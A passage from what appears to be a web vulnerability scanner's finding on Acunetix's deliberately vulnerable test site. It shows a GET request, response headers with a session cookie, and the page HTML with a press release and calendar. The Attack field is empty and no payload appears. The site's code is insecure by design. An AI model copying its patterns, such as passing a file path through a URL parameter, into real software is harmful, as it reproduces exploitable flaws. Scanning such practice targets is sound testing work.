height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1">
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 